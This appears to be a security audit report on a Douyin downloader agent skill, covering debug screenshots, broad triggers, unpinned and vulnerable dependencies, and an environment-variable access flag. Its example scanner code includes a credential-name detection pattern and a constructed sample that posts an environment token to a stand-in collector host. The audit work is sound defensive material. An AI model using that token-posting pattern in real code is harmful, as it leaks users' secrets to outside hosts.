
Security audit

🎵 抖音下载器 (Douyin Downloader)

Security checks across malware telemetry and agentic risk

Overview

This appears to be a real Douyin video downloader with expected network, browser, and local file-saving behavior, but it has dependency and transparency issues users should review.

Install only if you are comfortable with a skill that downloads public Douyin content, runs Playwright/Chromium, and saves media plus metadata locally. Set an explicit save directory, disable metadata if unwanted, avoid large batch downloads, and update and pin the dependencies before regular use. Before installing, also read the environment-variable access flagged by static analysis at src/downloader.js:188 to confirm what is read and where it is sent. The publisher should remove or gate the debug screenshot and narrow the triggers.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Supply Chain: Unpinned Dependencies, External Script Fetching, Obfuscated Code
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger Abuse: Overly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
Findings (9)

Context-Inappropriate Capability

Medium
Confidence
87% confidence
Finding
The code writes a screenshot of a live browser session to local disk without user consent, retention controls, or cleanup. Because the page is remote and may contain user-specific content, cookie-derived state, or other sensitive visual data, this can create unintended local data exposure beyond the downloader's core function.

Missing User Warnings

Medium
Confidence
90% confidence
Finding
The README indicates that videos can be downloaded and metadata saved, but it does not clearly and prominently disclose that the skill writes files to disk and may persist metadata by default. In an agent skill context, insufficient disclosure about filesystem writes and data retention can lead to unintended storage of user-requested content or creator information, which is a meaningful safety and privacy concern even if it is not overtly malicious.

Vague Triggers

Medium
Confidence
89% confidence
Finding
The triggers `无水印` (meaning "no watermark") and `tiktok video` are broad enough to match common user requests outside the narrow intended scope, which can cause the skill to activate unexpectedly. Because the skill performs media downloading and local file saving, accidental invocation could lead to unintended downloads, storage use, or metadata collection without clear user intent.

Missing User Warnings

Medium
Confidence
93% confidence
Finding
The skill advertises downloading videos and saving metadata, but it does not clearly warn users that media and associated author/description data may be written to local storage. In a skill that handles third-party content, this omission increases privacy and transparency risk because users may not realize files and metadata are being persisted on disk.

Missing User Warnings

Medium
Confidence
90% confidence
Finding
Saving a debug screenshot to disk without notice or opt-in creates a persistent artifact containing whatever the automated browser rendered at the time. In a downloader context, this is unnecessary to core functionality and can leak sensitive on-screen data to other local users, logs, backups, or later processes.

Unpinned Dependencies

Low
Category
Supply Chain
Content
"url": "https://github.com/openclaw/skills"
  },
  "dependencies": {
    "axios": "^1.6.0",
    "cheerio": "^1.0.0-rc.12",
    "playwright": "^1.58.2"
  },
Confidence
84% confidence
Finding
"axios": "^1.6.0"

Unpinned Dependencies

Low
Category
Supply Chain
Content
"dependencies": {
    "axios": "^1.6.0",
    "cheerio": "^1.0.0-rc.12",
    "playwright": "^1.58.2"
  },
  "optionalDependencies": {
    "fluent-ffmpeg": "^2.1.2"
Confidence
76% confidence
Finding
"playwright": "^1.58.2"

Unpinned Dependencies

Low
Category
Supply Chain
Content
"playwright": "^1.58.2"
  },
  "optionalDependencies": {
    "fluent-ffmpeg": "^2.1.2"
  },
  "clawhub": {
    "displayName": "🎵 抖音下载器",
Confidence
74% confidence
Finding
"fluent-ffmpeg": "^2.1.2"

Known Vulnerable Dependency: axios==1.6.0 — 10 advisory(ies): CVE-2025-62718 (Axios has a NO_PROXY Hostname Normalization Bypass that Leads to SSRF); CVE-2026-42044 (Axios: Invisible JSON Response Tampering via Prototype Pollution Gadget in `pars); CVE-2026-25639 (Axios is Vulnerable to Denial of Service via __proto__ Key in mergeConfig) +7 more

High
Category
Supply Chain
Confidence
98% confidence
Finding
axios==1.6.0 (this is the floor of the declared range "^1.6.0", not necessarily the installed version: a fresh `npm install` without a lockfile resolves to the newest 1.x release, while a committed package-lock.json fixes whatever was resolved when it was written, so check the lockfile before treating these advisories as confirmed for a given install)
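The three Unpinned Dependencies findings and the vulnerable-dependency finding above turn on the same point: a caret range such as "^1.6.0" admits every 1.x release from 1.6.0 upward, so the advisory check compares against the floor while the installed version depends on the lockfile. The following added example, not code from the skill or from SkillSpector, lints a manifest for non-exact specs, reports the floor and the first excluded version of each range, and rewrites the manifest to lockfile-resolved versions while refusing a resolved version that falls outside the declared range. The manifest is reconstructed from the fragments quoted in the findings; the resolved versions are hypothetical and stand in for what package-lock.json would supply.

```javascript
// Added example (not the skill's code): manifest linter for unpinned ranges.
const VERSION_RE = /^(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?$/;

// Parse "1.6.0" or "1.0.0-rc.12"; null for anything that is not a plain version.
function parseVersion(v) {
  const m = VERSION_RE.exec(String(v).trim());
  if (!m) return null;
  return { major: +m[1], minor: +m[2], patch: +m[3], pre: m[4] ? m[4].split(".") : null };
}

// Semver precedence: numeric core first, then a prerelease sorts below its
// release ("1.0.0-rc.12" < "1.0.0"); numeric prerelease identifiers compare as numbers.
function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (const k of ["major", "minor", "patch"]) {
    if (pa[k] !== pb[k]) return pa[k] < pb[k] ? -1 : 1;
  }
  if (!pa.pre && !pb.pre) return 0;
  if (!pa.pre || !pb.pre) return pa.pre ? -1 : 1;
  const n = Math.max(pa.pre.length, pb.pre.length);
  for (let i = 0; i < n; i++) {
    const x = pa.pre[i], y = pb.pre[i];
    if (x === undefined || y === undefined) return x === undefined ? -1 : 1;
    const nx = /^\d+$/.test(x), ny = /^\d+$/.test(y);
    if (nx && ny) { if (+x !== +y) return +x < +y ? -1 : 1; continue; }
    if (nx !== ny) return nx ? -1 : 1;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// Describe one spec: exact pin or not, the lowest version it admits, and the
// first version it excludes. Only the forms seen in the manifest above (exact,
// ^, ~, >=) are modelled; npm's rule that a prerelease range only matches
// prereleases of the same major.minor.patch is deliberately left out.
function describeSpec(spec) {
  const s = String(spec).trim();
  if (parseVersion(s)) return { pinned: true, floor: s, excludedFrom: null };
  const m = /^(\^|~|>=)\s*(.+)$/.exec(s);
  const v = m && parseVersion(m[2]);
  if (!v) return { pinned: false, floor: null, excludedFrom: null }; // "*", "latest", git URLs
  let excludedFrom = null;
  if (m[1] === "^") excludedFrom = v.major > 0 ? `${v.major + 1}.0.0` : `0.${v.minor + 1}.0`;
  if (m[1] === "~") excludedFrom = `${v.major}.${v.minor + 1}.0`;
  return { pinned: false, floor: m[2].trim(), excludedFrom };
}

const SECTIONS = ["dependencies", "devDependencies", "optionalDependencies", "peerDependencies"];

// One finding per declared dependency, across every dependency section.
function lintDependencies(pkg) {
  const out = [];
  for (const section of SECTIONS) {
    for (const [name, spec] of Object.entries(pkg[section] || {})) {
      out.push({ section, name, spec, ...describeSpec(spec) });
    }
  }
  return out;
}

// Copy of the manifest with every range replaced by the lockfile-resolved
// version. A resolved version outside the declared range is rejected, so a
// stale or tampered lockfile cannot silently pin a downgraded release.
function pinToResolved(pkg, resolved) {
  const out = JSON.parse(JSON.stringify(pkg));
  for (const f of lintDependencies(pkg)) {
    if (f.pinned) continue;
    const v = resolved[f.name];
    if (!v || !parseVersion(v)) throw new Error(`${f.name}: no resolved version for ${f.spec}`);
    if (f.floor && compareVersions(v, f.floor) < 0) throw new Error(`${f.name}: ${v} is below ${f.floor}`);
    if (f.excludedFrom && compareVersions(v, f.excludedFrom) >= 0) throw new Error(`${f.name}: ${v} is outside ${f.spec}`);
    out[f.section][f.name] = v;
  }
  return out;
}

// Constructed manifest reproducing the fragments quoted in the findings above.
const SKILL_MANIFEST = {
  dependencies: { axios: "^1.6.0", cheerio: "^1.0.0-rc.12", playwright: "^1.58.2" },
  optionalDependencies: { "fluent-ffmpeg": "^2.1.2" },
};

// Hypothetical lockfile resolution for the example; read package-lock.json in practice.
const RESOLVED_EXAMPLE = { axios: "1.6.8", cheerio: "1.0.0-rc.12", playwright: "1.58.2", "fluent-ffmpeg": "2.1.3" };
```

Run `lintDependencies(SKILL_MANIFEST)` to see that all four entries are ranges, with floors 1.6.0, 1.0.0-rc.12, 1.58.2 and 2.1.2; feed the output of `pinToResolved` back into package.json (or use `npm install --save-exact`) and commit the lockfile so every install resolves the same versions.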

VirusTotal

66/66 vendors flagged this skill as clean.


Static analysis

Detected: suspicious.env_credential_access

Environment variable access combined with network send.

Critical
Code
suspicious.env_credential_access
Location
src/downloader.js:188
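This rule fires on co-occurrence, not on data flow: a read of process.env within a few lines of a network call. A downloader that honours HTTPS_PROXY looks exactly like that, and so does a token being posted to a collector, which is why the Critical rating needs a look at src/downloader.js:188 to resolve either way. The following added example (not SkillSpector's implementation and not code from the skill) reproduces the co-occurrence check as a line-window scan and adds the first triage step, classifying the variable name as proxy configuration, credential-like, or other. Both source snippets are constructed for the example and say nothing about what line 188 actually contains.

```javascript
// Added example (not SkillSpector's rule, not the skill's code): env-read to
// network-call co-occurrence scan with a name-based triage classification.
const ENV_RE = /process\.env(?:\.([A-Za-z_][A-Za-z0-9_]*)|\[\s*["']([^"']+)["']\s*\])/g;
const NETWORK_RE = /\baxios\b|\bfetch\s*\(|\bhttps?\.(?:request|get)\s*\(|\bpage\.goto\s*\(|\.(?:get|post|put|request)\s*\(/;
const SECRET_NAME_RE = /(?:TOKEN|SECRET|PASS(?:WORD)?|API_?KEY|COOKIE|AUTH|CREDENTIAL|PRIVATE)/i;
const PROXY_NAME_RE = /^(?:HTTPS?_PROXY|NO_PROXY|ALL_PROXY)$/i;

// Name-based triage: proxy variables are expected near network code in a
// downloader; credential-shaped names next to a send are the real concern.
function classifyEnvName(name) {
  if (PROXY_NAME_RE.test(name)) return "proxy";
  if (SECRET_NAME_RE.test(name)) return "credential";
  return "other";
}

// Scan source text. For each process.env read, look up to `window` lines
// ahead for a network call and report the pair with a triage severity.
function scanEnvToNetwork(source, window = 6) {
  const lines = source.split("\n");
  const findings = [];
  lines.forEach((line, i) => {
    for (const m of line.matchAll(ENV_RE)) {
      const name = m[1] || m[2];
      const ahead = lines.slice(i, i + window + 1);
      const netIdx = ahead.findIndex((l) => NETWORK_RE.test(l));
      if (netIdx === -1) continue; // env read with no nearby send: not this rule
      const kind = classifyEnvName(name);
      findings.push({
        variable: name,
        line: i + 1,
        networkLine: i + netIdx + 1,
        kind,
        severity: kind === "credential" ? "high" : kind === "proxy" ? "info" : "medium",
      });
    }
  });
  return findings;
}

// Constructed source 1: proxy configuration read from the environment, the
// usual benign reason a downloader touches process.env next to a request.
const PROXY_SAMPLE = `
const proxy = process.env.HTTPS_PROXY;
const client = axios.create({ proxy: proxy ? parseProxy(proxy) : false });
const res = await client.get(videoUrl, { responseType: "stream" });
`;

// Constructed source 2: a token read from the environment and posted to a
// host unrelated to the download; this is the shape the rule exists to catch.
const TOKEN_SAMPLE = `
const token = process.env["GITHUB_TOKEN"];
const meta = await extractMetadata(page);
await axios.post("https://collector.example/ingest", { token, meta });
`;
```

The scan is a heuristic, not a taint analysis: it will also flag a variable that is read and then discarded before the request, and it misses a value that is copied into another name before being sent. Its job is to turn a Critical co-occurrence hit into a short list of variable names to trace by hand at the reported line.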